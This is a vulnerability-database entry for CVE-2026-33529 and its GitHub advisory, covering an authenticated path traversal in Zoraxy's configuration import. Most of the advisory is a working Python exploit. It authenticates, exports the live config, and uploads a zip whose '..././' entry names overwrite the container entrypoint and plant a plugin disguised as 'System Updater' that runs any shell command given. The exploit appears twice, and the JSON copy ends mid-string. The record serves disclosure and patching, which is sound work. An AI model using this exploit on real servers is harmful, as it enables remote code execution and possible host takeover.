CVE-2026-33529 (GCVE-0-2026-33529)

Vulnerability from cvelistv5 – Published: 2026-03-26 19:26 – Updated: 2026-03-27 19:48

Title

Zoraxy: Authenticated Path Traversal in Config Import leads to RCE

Summary

Zoraxy is a general purpose HTTP reverse proxy and forwarding tool. Prior to version 3.3.2, an authenticated path traversal vulnerability in the configuration import endpoint allows an authenticated user to write arbitrary files outside the config directory, which can lead to RCE by creating a plugin. Version 3.3.2 patches the issue.

Severity ?

3.3 (Low)


                        
                          CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/tobychui/zoraxy/security/advis…	x_refsource_CONFIRM
	https://github.com/tobychui/zoraxy/commit/69ac755…	x_refsource_MISC
	https://github.com/tobychui/zoraxy/releases/tag/v3.3.2	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	tobychui	zoraxy	Affected: < 3.3.2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33529",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-27T19:48:19.703448Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-27T19:48:28.328Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "zoraxy",
          "vendor": "tobychui",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 3.3.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Zoraxy is a general purpose HTTP reverse proxy and forwarding tool. Prior to version 3.3.2, an authenticated path traversal vulnerability in the configuration import endpoint allows an authenticated user to write arbitrary files outside the config directory, which can lead to RCE by creating a plugin. Version 3.3.2 patches the issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 3.3,
            "baseSeverity": "LOW",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-26T19:26:32.646Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/tobychui/zoraxy/security/advisories/GHSA-7pq3-326h-f8q9",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/tobychui/zoraxy/security/advisories/GHSA-7pq3-326h-f8q9"
        },
        {
          "name": "https://github.com/tobychui/zoraxy/commit/69ac755aeec5d15ba4c62099f7f1ed77a855b40b",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/tobychui/zoraxy/commit/69ac755aeec5d15ba4c62099f7f1ed77a855b40b"
        },
        {
          "name": "https://github.com/tobychui/zoraxy/releases/tag/v3.3.2",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/tobychui/zoraxy/releases/tag/v3.3.2"
        }
      ],
      "source": {
        "advisory": "GHSA-7pq3-326h-f8q9",
        "discovery": "UNKNOWN"
      },
      "title": "Zoraxy: Authenticated Path Traversal in Config Import leads to RCE"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33529",
    "datePublished": "2026-03-26T19:26:32.646Z",
    "dateReserved": "2026-03-20T18:05:11.830Z",
    "dateUpdated": "2026-03-27T19:48:28.328Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-33529",
      "date": "2026-04-24",
      "epss": "0.00064",
      "percentile": "0.19812"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33529\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-26T20:16:15.070\",\"lastModified\":\"2026-04-02T18:13:03.553\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Zoraxy is a general purpose HTTP reverse proxy and forwarding tool. Prior to version 3.3.2, an authenticated path traversal vulnerability in the configuration import endpoint allows an authenticated user to write arbitrary files outside the config directory, which can lead to RCE by creating a plugin. Version 3.3.2 patches the issue.\"},{\"lang\":\"es\",\"value\":\"Zoraxy es una herramienta de proxy inverso HTTP y reenv\u00edo de prop\u00f3sito general. Antes de la versi\u00f3n 3.3.2, una vulnerabilidad de salto de ruta autenticado en el endpoint de importaci\u00f3n de configuraci\u00f3n permite a un usuario autenticado escribir archivos arbitrarios fuera del directorio de configuraci\u00f3n, lo que puede llevar a RCE mediante la creaci\u00f3n de un plugin. La versi\u00f3n 3.3.2 corrige el problema.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N\",\"baseScore\":3.3,\"baseSeverity\":\"LOW\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":0.7,\"impactScore\":2.5},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:zoraxy:zoraxy:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"3.3.2\",\"matchCriteriaId\":\"53E3D478-D37C-4CC6-96FF-381A55956C57\"}]}]}],\"references\":[{\"url\":\"https://github.com/tobychui/zoraxy/commit/69ac755aeec5d15ba4c62099f7f1ed77a855b40b\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/tobychui/zoraxy/releases/tag/v3.3.2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/tobychui/zoraxy/security/advisories/GHSA-7pq3-326h-f8q9\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33529\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-27T19:48:19.703448Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-27T19:48:24.418Z\"}}], \"cna\": {\"title\": \"Zoraxy: Authenticated Path Traversal in Config Import leads to RCE\", \"source\": {\"advisory\": \"GHSA-7pq3-326h-f8q9\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 3.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"LOW\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"HIGH\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"tobychui\", \"product\": \"zoraxy\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 3.3.2\"}]}], \"references\": [{\"url\": \"https://github.com/tobychui/zoraxy/security/advisories/GHSA-7pq3-326h-f8q9\", \"name\": \"https://github.com/tobychui/zoraxy/security/advisories/GHSA-7pq3-326h-f8q9\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/tobychui/zoraxy/commit/69ac755aeec5d15ba4c62099f7f1ed77a855b40b\", \"name\": \"https://github.com/tobychui/zoraxy/commit/69ac755aeec5d15ba4c62099f7f1ed77a855b40b\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/tobychui/zoraxy/releases/tag/v3.3.2\", \"name\": \"https://github.com/tobychui/zoraxy/releases/tag/v3.3.2\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Zoraxy is a general purpose HTTP reverse proxy and forwarding tool. Prior to version 3.3.2, an authenticated path traversal vulnerability in the configuration import endpoint allows an authenticated user to write arbitrary files outside the config directory, which can lead to RCE by creating a plugin. Version 3.3.2 patches the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-26T19:26:32.646Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33529\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-27T19:48:28.328Z\", \"dateReserved\": \"2026-03-20T18:05:11.830Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-26T19:26:32.646Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-7PQ3-326H-F8Q9

Vulnerability from github – Published: 2026-03-25 20:04 – Updated: 2026-03-27 21:24

Summary

Zoraxy: Authenticated Path Traversal in Config Import leads to RCE

Details

Authenticated Path Traversal to RCE via Configuration Import

Summary

An authenticated path traversal vulnerability in the configuration import endpoint allows an authenticated user to write arbitrary files outside the config directory, which can lead to RCE by creating a plugin.

Details

The vulnerable endpoint is POST /api/conf/import.

The zip entry names sanitization is bypassed by embedding ../ inside a longer sequence so the replacement produces a new ../:

conf/..././..././entrypoint.py
  → ReplaceAll("../", "")  (match found at index 1 of "..././", leaving "../")
  → conf/../../entrypoint.py   ← passes HasPrefix check, escapes conf/

Using this endpoint, a new plugin can be written (persistent) and the entrypoint (non-persistent) can be edited to add execution permissions to the plugin. When the database is provided in the import, the program should exit to trigger a container restart (which does not happen because the entrypoint does not monitor the Zoraxy exit code). As a result, the container was manually restarted for the PoC to work.

PoC

import argparse
import io
import json
import re
import sys
import zipfile

import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

INTRO_SPEC_JSON = json.dumps({
    "id": "com.attacker.evil",
    "name": "System Updater",
    "author": "System",
    "author_contact": "",
    "description": "Internal system update module",
    "url": "",
    "ui_path": "/ui",
    "type": 1,
    "version_major": 1,
    "version_minor": 0,
    "version_patch": 0,
    "permitted_api_endpoints": [],
})

LINUX_START_SH = """\
#!/bin/sh
INTRO_SPEC='{intro_spec}'

run_payload() {{
{payload_lines}
}}

case "$1" in
  -introspect)
    run_payload
    printf '%s\\n' "$INTRO_SPEC"
    exit 0
    ;;
  -configure=*)
    run_payload
    while true; do sleep 3600; done
    ;;
esac
"""

MALICIOUS_ENTRYPOINT_PY = """\
#!/usr/bin/env python3
import os, subprocess, signal, sys, time

try:
    subprocess.run({cmd_list}, shell=False)
except Exception:
    pass

try:
    os.chmod("/opt/zoraxy/plugin/evil/start.sh", 0o755)
except Exception:
    pass

zoraxy_proc = None
zerotier_proc = None

def getenv(key, default=None):
  return os.environ.get(key, default)

def run(command):
  try:
    subprocess.run(command, check=True)
  except subprocess.CalledProcessError as e:
    print(f"Command failed: {command} - {e}")
    sys.exit(1)

def popen(command):
  proc = subprocess.Popen(command)
  time.sleep(1)
  if proc.poll() is not None:
    print(f"{command} exited early with code {proc.returncode}")
    raise RuntimeError(f"Failed to start {command}")
  return proc

def cleanup(_signum, _frame):
  global zoraxy_proc, zerotier_proc
  if zoraxy_proc and zoraxy_proc.poll() is None:
    zoraxy_proc.terminate()
  if zerotier_proc and zerotier_proc.poll() is None:
    zerotier_proc.terminate()
  if zoraxy_proc:
    try:
      zoraxy_proc.wait(timeout=8)
    except subprocess.TimeoutExpired:
      zoraxy_proc.kill()
      zoraxy_proc.wait()
  if zerotier_proc:
    try:
      zerotier_proc.wait(timeout=8)
    except subprocess.TimeoutExpired:
      zerotier_proc.kill()
      zerotier_proc.wait()
  try:
    os.unlink("/var/lib/zerotier-one")
  except Exception:
    pass
  sys.exit(0)

def start_zerotier():
  global zerotier_proc
  config_dir = "/opt/zoraxy/config/zerotier/"
  zt_path = "/var/lib/zerotier-one"
  os.makedirs(config_dir, exist_ok=True)
  try:
    os.symlink(config_dir, zt_path, target_is_directory=True)
  except FileExistsError:
    pass
  zerotier_proc = popen(["zerotier-one"])

def start_zoraxy():
  global zoraxy_proc
  zoraxy_args = [
    "zoraxy",
    f"-autorenew={getenv('AUTORENEW', '86400')}",
    f"-cfgupgrade={getenv('CFGUPGRADE', 'true')}",
    f"-db={getenv('DB', 'auto')}",
    f"-docker={getenv('DOCKER', 'true')}",
    f"-earlyrenew={getenv('EARLYRENEW', '30')}",
    f"-enablelog={getenv('ENABLELOG', 'true')}",
    f"-fastgeoip={getenv('FASTGEOIP', 'false')}",
    f"-mdns={getenv('MDNS', 'true')}",
    f"-mdnsname={getenv('MDNSNAME', \"''\")}",
    f"-noauth={getenv('NOAUTH', 'false')}",
    f"-plugin={getenv('PLUGIN', '/opt/zoraxy/plugin/')}",
    f"-port=:{getenv('PORT', '8000')}",
    f"-sshlb={getenv('SSHLB', 'false')}",
    f"-version={getenv('VERSION', 'false')}",
    f"-webroot={getenv('WEBROOT', './www')}",
  ]
  zoraxy_proc = popen(zoraxy_args)

def main():
  signal.signal(signal.SIGTERM, cleanup)
  signal.signal(signal.SIGINT, cleanup)
  run(["update-ca-certificates"])
  if getenv("UPDATE_GEOIP", "false").lower() == "true":
    run(["zoraxy", "-update_geoip=true"])
  os.chdir("/opt/zoraxy/config/")
  if getenv("ZEROTIER", "false") == "true":
    start_zerotier()
  start_zoraxy()
  signal.pause()

if __name__ == "__main__":
  main()
"""


def get_csrf(host: str, session: requests.Session) -> tuple:
    r = session.get(f"{host}/login.html", timeout=10, verify=False)
    m = re.search(r'<meta[^>]+name=["\']zoraxy\.csrf\.Token["\'][^>]+content=["\']([^"\']+)["\']', r.text)
    if not m:
        m = re.search(r'<meta[^>]+content=["\']([^"\']+)["\'][^>]+name=["\']zoraxy\.csrf\.Token["\']', r.text)
    token = m.group(1) if m else r.headers.get("X-CSRF-Token", "")
    return token, f"{host}/login.html"


def authenticate(host: str, username: str, password: str,
                 session: requests.Session) -> bool:
    csrf, referer = get_csrf(host, session)
    print(f"    CSRF token  -> {csrf!r}")
    r = session.post(
        f"{host}/api/auth/login",
        data={"username": username, "password": password},
        headers={"X-CSRF-Token": csrf, "Referer": referer},
        timeout=10, verify=False,
    )
    print(f"    Login       -> HTTP {r.status_code}  {r.text[:120]!r}")
    return r.status_code == 200 and r.text.strip().strip('"').lower() in ("ok", "true")


def upload_zip(host: str, session: requests.Session, zip_bytes: bytes) -> tuple:
    csrf, referer = get_csrf(host, session)
    r = session.post(
        f"{host}/api/conf/import",
        files={"file": ("backup.zip", zip_bytes, "application/zip")},
        headers={"X-CSRF-Token": csrf, "Referer": referer},
        timeout=30, verify=False,
    )
    return r.status_code, r.text


def export_config(host: str, session: requests.Session) -> bytes | None:
    r = session.get(
        f"{host}/api/conf/export?includeDB=true",
        timeout=60, verify=False,
    )
    if r.status_code == 200 and len(r.content) > 100:
        return r.content
    return None


def build_zip(cmd: str, export_zip: bytes) -> bytes:
    traversal_ep = "conf/..././..././entrypoint.py"
    traversal_sh = "conf/..././..././plugin/evil/start.sh"

    payload_lines = "\n".join(f"  {line}" for line in cmd.splitlines()) or "  id > /tmp/pwned.txt"
    start_sh = LINUX_START_SH.format(
        intro_spec=INTRO_SPEC_JSON.replace("'", "'\\''"),
        payload_lines=payload_lines,
    )
    malicious_ep = MALICIOUS_ENTRYPOINT_PY.replace("{cmd_list}", repr(["sh", "-c", cmd]))

    buf = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(export_zip), "r") as src:
        with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
            for item in src.infolist():
                zf.writestr(item, src.read(item.filename))
            zf.writestr(zipfile.ZipInfo(traversal_ep), malicious_ep.encode())
            zf.writestr(zipfile.ZipInfo(traversal_sh), start_sh.encode())
    buf.seek(0)
    return buf.read()


def main() -> None:
    parser = argparse.ArgumentParser(
        description="Zoraxy Authenticated RCE via Entrypoint Overwrite + Plugin Zip-Slip",
    )
    parser.add_argument("--host",  help="Target, e.g. http://192.168.1.10:8000")
    parser.add_argument("--user",  default="admin")
    parser.add_argument("--pass",  dest="password", default=None)
    parser.add_argument("--cmd", default="id > /tmp/pwned.txt",
                        help="Shell command to embed in the payload")
    args = parser.parse_args()

    if not args.host or not args.password:
        parser.error("--host and --pass are required")
    host = args.host.rstrip("/")

    print(f"\n[1] Authenticating as '{args.user}' at {host} ...")
    session = requests.Session()
    if not authenticate(host, args.user, args.password, session):
        print("[-] Authentication failed.")
        sys.exit(1)
    print("[+] Authenticated.")

    print(f"\n[2] Exporting live config ...")
    export_zip = export_config(host, session)
    if not export_zip:
        print("[-] Config export failed.")
        sys.exit(1)
    print("\n[3] Building malicious zip ...")
    zip_bytes = build_zip(args.cmd, export_zip)
    print(f"[+] Zip size: {len(zip_bytes):,} bytes")

    print(f"\n[4] Uploading via POST {host}/api/conf/import ...")
    code, body = upload_zip(host, session, zip_bytes)
    print(f"    HTTP {code}  {body[:200]!r}")
    if code != 200:
        print("[-] Upload failed.")
        sys.exit(1)
    print("[+] Files written")


if __name__ == "__main__":
    main()

Impact

Arbitrary file write leads to RCE by an authenticated user. Given that the Docker socket might be mapped, this issue can lead to full host takeover.

Severity ?

3.3 (Low)


                  
                    CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/tobychui/zoraxy"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.3.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33529"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-25T20:04:44Z",
    "nvd_published_at": "2026-03-26T20:16:15Z",
    "severity": "LOW"
  },
  "details": "# Authenticated Path Traversal to RCE via Configuration Import\n\n## Summary\n\nAn authenticated path traversal vulnerability in the configuration import endpoint allows an authenticated user to write arbitrary files outside the config directory, which can lead to RCE by creating a plugin.\n\n## Details\n\nThe vulnerable endpoint is `POST /api/conf/import`.\n\nThe zip entry names sanitization is bypassed by embedding `../` inside a longer sequence so the replacement produces a new `../`:\n\n```\nconf/..././..././entrypoint.py\n  \u2192 ReplaceAll(\"../\", \"\")  (match found at index 1 of \"..././\", leaving \"../\")\n  \u2192 conf/../../entrypoint.py   \u2190 passes HasPrefix check, escapes conf/\n```\n\nUsing this endpoint, a new plugin can be written (persistent) and the entrypoint (non-persistent) can be edited to add execution permissions to the plugin.\nWhen the database is provided in the import, the program should exit to trigger a container restart (which does not happen because the entrypoint does not monitor the Zoraxy exit code).\nAs a result, the container was manually restarted for the PoC to work.\n\n## PoC\n\n```python\nimport argparse\nimport io\nimport json\nimport re\nimport sys\nimport zipfile\n\nimport requests\nimport urllib3\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nINTRO_SPEC_JSON = json.dumps({\n    \"id\": \"com.attacker.evil\",\n    \"name\": \"System Updater\",\n    \"author\": \"System\",\n    \"author_contact\": \"\",\n    \"description\": \"Internal system update module\",\n    \"url\": \"\",\n    \"ui_path\": \"/ui\",\n    \"type\": 1,\n    \"version_major\": 1,\n    \"version_minor\": 0,\n    \"version_patch\": 0,\n    \"permitted_api_endpoints\": [],\n})\n\nLINUX_START_SH = \"\"\"\\\n#!/bin/sh\nINTRO_SPEC=\u0027{intro_spec}\u0027\n\nrun_payload() {{\n{payload_lines}\n}}\n\ncase \"$1\" in\n  -introspect)\n    run_payload\n    printf \u0027%s\\\\n\u0027 \"$INTRO_SPEC\"\n    exit 0\n    ;;\n  -configure=*)\n    run_payload\n    while true; do sleep 3600; done\n    ;;\nesac\n\"\"\"\n\nMALICIOUS_ENTRYPOINT_PY = \"\"\"\\\n#!/usr/bin/env python3\nimport os, subprocess, signal, sys, time\n\ntry:\n    subprocess.run({cmd_list}, shell=False)\nexcept Exception:\n    pass\n\ntry:\n    os.chmod(\"/opt/zoraxy/plugin/evil/start.sh\", 0o755)\nexcept Exception:\n    pass\n\nzoraxy_proc = None\nzerotier_proc = None\n\ndef getenv(key, default=None):\n  return os.environ.get(key, default)\n\ndef run(command):\n  try:\n    subprocess.run(command, check=True)\n  except subprocess.CalledProcessError as e:\n    print(f\"Command failed: {command} - {e}\")\n    sys.exit(1)\n\ndef popen(command):\n  proc = subprocess.Popen(command)\n  time.sleep(1)\n  if proc.poll() is not None:\n    print(f\"{command} exited early with code {proc.returncode}\")\n    raise RuntimeError(f\"Failed to start {command}\")\n  return proc\n\ndef cleanup(_signum, _frame):\n  global zoraxy_proc, zerotier_proc\n  if zoraxy_proc and zoraxy_proc.poll() is None:\n    zoraxy_proc.terminate()\n  if zerotier_proc and zerotier_proc.poll() is None:\n    zerotier_proc.terminate()\n  if zoraxy_proc:\n    try:\n      zoraxy_proc.wait(timeout=8)\n    except subprocess.TimeoutExpired:\n      zoraxy_proc.kill()\n      zoraxy_proc.wait()\n  if zerotier_proc:\n    try:\n      zerotier_proc.wait(timeout=8)\n    except subprocess.TimeoutExpired:\n      zerotier_proc.kill()\n      zerotier_proc.wait()\n  try:\n    os.unlink(\"/var/lib/zerotier-one\")\n  except Exception:\n    pass\n  sys.exit(0)\n\ndef start_zerotier():\n  global zerotier_proc\n  config_dir = \"/opt/zoraxy/config/zerotier/\"\n  zt_path = \"/var/lib/zerotier-one\"\n  os.makedirs(config_dir, exist_ok=True)\n  try:\n    os.symlink(config_dir, zt_path, target_is_directory=True)\n  except FileExistsError:\n    pass\n  zerotier_proc = popen([\"zerotier-one\"])\n\ndef start_zoraxy():\n  global zoraxy_proc\n  zoraxy_args = [\n    \"zoraxy\",\n    f\"-autorenew={getenv(\u0027AUTORENEW\u0027, \u002786400\u0027)}\",\n    f\"-cfgupgrade={getenv(\u0027CFGUPGRADE\u0027, \u0027true\u0027)}\",\n    f\"-db={getenv(\u0027DB\u0027, \u0027auto\u0027)}\",\n    f\"-docker={getenv(\u0027DOCKER\u0027, \u0027true\u0027)}\",\n    f\"-earlyrenew={getenv(\u0027EARLYRENEW\u0027, \u002730\u0027)}\",\n    f\"-enablelog={getenv(\u0027ENABLELOG\u0027, \u0027true\u0027)}\",\n    f\"-fastgeoip={getenv(\u0027FASTGEOIP\u0027, \u0027false\u0027)}\",\n    f\"-mdns={getenv(\u0027MDNS\u0027, \u0027true\u0027)}\",\n    f\"-mdnsname={getenv(\u0027MDNSNAME\u0027, \\\"\u0027\u0027\\\")}\",\n    f\"-noauth={getenv(\u0027NOAUTH\u0027, \u0027false\u0027)}\",\n    f\"-plugin={getenv(\u0027PLUGIN\u0027, \u0027/opt/zoraxy/plugin/\u0027)}\",\n    f\"-port=:{getenv(\u0027PORT\u0027, \u00278000\u0027)}\",\n    f\"-sshlb={getenv(\u0027SSHLB\u0027, \u0027false\u0027)}\",\n    f\"-version={getenv(\u0027VERSION\u0027, \u0027false\u0027)}\",\n    f\"-webroot={getenv(\u0027WEBROOT\u0027, \u0027./www\u0027)}\",\n  ]\n  zoraxy_proc = popen(zoraxy_args)\n\ndef main():\n  signal.signal(signal.SIGTERM, cleanup)\n  signal.signal(signal.SIGINT, cleanup)\n  run([\"update-ca-certificates\"])\n  if getenv(\"UPDATE_GEOIP\", \"false\").lower() == \"true\":\n    run([\"zoraxy\", \"-update_geoip=true\"])\n  os.chdir(\"/opt/zoraxy/config/\")\n  if getenv(\"ZEROTIER\", \"false\") == \"true\":\n    start_zerotier()\n  start_zoraxy()\n  signal.pause()\n\nif __name__ == \"__main__\":\n  main()\n\"\"\"\n\n\ndef get_csrf(host: str, session: requests.Session) -\u003e tuple:\n    r = session.get(f\"{host}/login.html\", timeout=10, verify=False)\n    m = re.search(r\u0027\u003cmeta[^\u003e]+name=[\"\\\u0027]zoraxy\\.csrf\\.Token[\"\\\u0027][^\u003e]+content=[\"\\\u0027]([^\"\\\u0027]+)[\"\\\u0027]\u0027, r.text)\n    if not m:\n        m = re.search(r\u0027\u003cmeta[^\u003e]+content=[\"\\\u0027]([^\"\\\u0027]+)[\"\\\u0027][^\u003e]+name=[\"\\\u0027]zoraxy\\.csrf\\.Token[\"\\\u0027]\u0027, r.text)\n    token = m.group(1) if m else r.headers.get(\"X-CSRF-Token\", \"\")\n    return token, f\"{host}/login.html\"\n\n\ndef authenticate(host: str, username: str, password: str,\n                 session: requests.Session) -\u003e bool:\n    csrf, referer = get_csrf(host, session)\n    print(f\"    CSRF token  -\u003e {csrf!r}\")\n    r = session.post(\n        f\"{host}/api/auth/login\",\n        data={\"username\": username, \"password\": password},\n        headers={\"X-CSRF-Token\": csrf, \"Referer\": referer},\n        timeout=10, verify=False,\n    )\n    print(f\"    Login       -\u003e HTTP {r.status_code}  {r.text[:120]!r}\")\n    return r.status_code == 200 and r.text.strip().strip(\u0027\"\u0027).lower() in (\"ok\", \"true\")\n\n\ndef upload_zip(host: str, session: requests.Session, zip_bytes: bytes) -\u003e tuple:\n    csrf, referer = get_csrf(host, session)\n    r = session.post(\n        f\"{host}/api/conf/import\",\n        files={\"file\": (\"backup.zip\", zip_bytes, \"application/zip\")},\n        headers={\"X-CSRF-Token\": csrf, \"Referer\": referer},\n        timeout=30, verify=False,\n    )\n    return r.status_code, r.text\n\n\ndef export_config(host: str, session: requests.Session) -\u003e bytes | None:\n    r = session.get(\n        f\"{host}/api/conf/export?includeDB=true\",\n        timeout=60, verify=False,\n    )\n    if r.status_code == 200 and len(r.content) \u003e 100:\n        return r.content\n    return None\n\n\ndef build_zip(cmd: str, export_zip: bytes) -\u003e bytes:\n    traversal_ep = \"conf/..././..././entrypoint.py\"\n    traversal_sh = \"conf/..././..././plugin/evil/start.sh\"\n\n    payload_lines = \"\\n\".join(f\"  {line}\" for line in cmd.splitlines()) or \"  id \u003e /tmp/pwned.txt\"\n    start_sh = LINUX_START_SH.format(\n        intro_spec=INTRO_SPEC_JSON.replace(\"\u0027\", \"\u0027\\\\\u0027\u0027\"),\n        payload_lines=payload_lines,\n    )\n    malicious_ep = MALICIOUS_ENTRYPOINT_PY.replace(\"{cmd_list}\", repr([\"sh\", \"-c\", cmd]))\n\n    buf = io.BytesIO()\n    with zipfile.ZipFile(io.BytesIO(export_zip), \"r\") as src:\n        with zipfile.ZipFile(buf, \"w\", zipfile.ZIP_DEFLATED) as zf:\n            for item in src.infolist():\n                zf.writestr(item, src.read(item.filename))\n            zf.writestr(zipfile.ZipInfo(traversal_ep), malicious_ep.encode())\n            zf.writestr(zipfile.ZipInfo(traversal_sh), start_sh.encode())\n    buf.seek(0)\n    return buf.read()\n\n\ndef main() -\u003e None:\n    parser = argparse.ArgumentParser(\n        description=\"Zoraxy Authenticated RCE via Entrypoint Overwrite + Plugin Zip-Slip\",\n    )\n    parser.add_argument(\"--host\",  help=\"Target, e.g. http://192.168.1.10:8000\")\n    parser.add_argument(\"--user\",  default=\"admin\")\n    parser.add_argument(\"--pass\",  dest=\"password\", default=None)\n    parser.add_argument(\"--cmd\", default=\"id 